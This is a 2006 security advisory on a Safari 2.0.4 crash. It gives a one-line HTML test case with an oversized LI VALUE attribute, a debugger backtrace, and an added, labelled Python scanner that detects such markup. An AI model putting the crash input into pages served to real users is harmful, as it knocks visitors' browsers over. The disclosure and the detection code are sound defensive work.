Apple OSX Safari 2.0.4 "WebTextRenderer" DoS


Release Date:
November 28th, 2006

Severity:
Low

Vendor:
Apple

Versions Affected:
OSX 10.4.8
Safari 2.0.4 (419.3)

Versions Not Affected:
WebKit build 17902

Overview:
A denial of service (null pointer dereference) vulnerability exists in Safari 2.0.4 and all prior versions, which allows an attacker to post a specially crafted .html page that causes the application to crash.

Technical Details:
Safari/WebKit does not properly parse the VALUE attribute of the LI HTML tag when it contains more than 10 characters. Below is a basic test case that reproduces this issue:

<LI VALUE=1234567890 TYPE=A>

Below is the crash triggered on OSX 10.4.8 with Safari 2.0.4 (419.3):

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x95227426 in -[WebTextRenderer(WebInternal) _CG_drawRun:style:geometry:] ()
(gdb) bt
#0 0x95227426 in -[WebTextRenderer(WebInternal) _CG_drawRun:style:geometry:] ()
#1 0x954dadeb in QPainter::drawText ()
#2 0x9543e58d in khtml::RenderListMarker::paint ()
#3 0x95424441 in khtml::InlineBox::paint ()
#4 0x95423cab in khtml::InlineFlowBox::paint ()
#5 0x95423ad1 in khtml::RootInlineBox::paint ()
#6 0x954224c9 in khtml::RenderFlow::paintLines ()
#7 0x9541fa1b in khtml::RenderBlock::paintObject ()
#8 0x9541f960 in khtml::RenderBlock::paint ()
#9 0x954211e9 in khtml::RenderBlock::paintChildren ()
#10 0x9541fa3a in khtml::RenderBlock::paintObject ()
#11 0x9541f960 in khtml::RenderBlock::paint ()
#12 0x954211e9 in khtml::RenderBlock::paintChildren ()
#13 0x9541fa3a in khtml::RenderBlock::paintObject ()
#14 0x9541f960 in khtml::RenderBlock::paint ()
#15 0x9541e6a0 in khtml::RenderLayer::paintLayer ()
#16 0x9541e767 in khtml::RenderLayer::paintLayer ()
#17 0x9541e2e2 in khtml::RenderLayer::paint ()
#18 0x9541e238 in KWQKHTMLPart::paint ()
== snip ==
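As an added example that is not part of the advisory, the following scanner flags HTML containing LI elements whose VALUE attribute is 10 or more characters long, which covers both the advisory's wording ("more than 10 characters") and its own 10-character test case. It is the kind of check a content filter or proxy could run; the sample HTML is constructed for illustration.

```python
"""Flag <LI> elements whose VALUE attribute is long enough to match the
pattern the advisory associates with the Safari 2.0.4 crash.

Added example, not part of the advisory or of WebKit.  The threshold
comes from the advisory; the sample document below is constructed."""
from html.parser import HTMLParser

# The advisory says "more than 10 characters" but its own test case uses
# exactly 10, so flag values of 10 characters or more.
MAX_VALUE_LEN = 10


class ListValueScanner(HTMLParser):
    """Collect (line_number, value) for every <li> with a long VALUE."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lowercases tag and attribute names and strips quotes,
        # so <LI VALUE=...> and <li value="...">  are handled alike.
        if tag != "li":
            return
        for name, value in attrs:
            if name == "value" and value is not None and len(value) >= MAX_VALUE_LEN:
                line, _offset = self.getpos()
                self.findings.append((line, value))


def scan_html(document: str):
    """Return [(line, value), ...] for every suspicious LI VALUE attribute."""
    scanner = ListValueScanner()
    scanner.feed(document)
    scanner.close()
    return scanner.findings


# Constructed sample: a benign item, the advisory's test case, and a quoted variant.
SAMPLE = """<html><body><ol>
<LI VALUE=5 TYPE=A>normal</LI>
<LI VALUE=1234567890 TYPE=A>advisory test case</LI>
<li value="12345678901234">quoted oversized</li>
</ol></body></html>"""

if __name__ == "__main__":
    for line, value in scan_html(SAMPLE):
        print(f"line {line}: LI VALUE attribute of length {len(value)}")
```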

Vendor Status:
09/05/2006: Vendor Notified

Solution:
WebKit build 17902 fixes this issue; the shipping Safari release is still vulnerable.

Discovered by:
Tom Ferris
tommy[at]security-protocols[dot]com

Related Links:
http://security-protocols.com/poc/sp-x36.html
http://security-protocols.com/sp-x36-advisory.php
http://nightly.webkit.org
http://apple.com

2006 Security-Protocols, LLC